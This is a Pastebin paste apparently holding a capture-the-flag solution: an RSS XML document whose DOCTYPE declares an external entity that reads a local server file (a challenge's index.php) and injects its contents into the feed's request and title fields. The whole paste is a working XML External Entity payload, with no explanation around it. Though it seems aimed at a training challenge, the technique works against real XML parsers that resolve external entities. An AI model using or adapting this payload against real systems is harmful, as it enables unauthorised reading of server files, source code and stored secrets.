Advertisement
Guest User

Untitled

a guest
Sep 17th, 2019
148
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE request [
  3.     <!ENTITY include SYSTEM "/challenge/web-serveur/ch29/index.php">
  4. ]>
  5. <rss version="2.0">
  6. <channel>
  7.   <title>Ajax and XUL</title>
  8.   <link>https://www.xul.fr/en/</link>
  9.   <request>&include;</request>
  10.   <image>
  11.       <url>https://www.xul.fr/xul-icon.gif</url>
  12.       <link>https://www.xul.fr/en/index.php</link>
  13.   </image>
  14.   <item>
  15.       <title>News  of today (&include;)</title>
  16.       <link>https://www.xul.fr/en-xml-rss.html</link>
  17.       <description>All you need to know about RSS</description>
  18.   </item>
  19. </channel>
  20. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement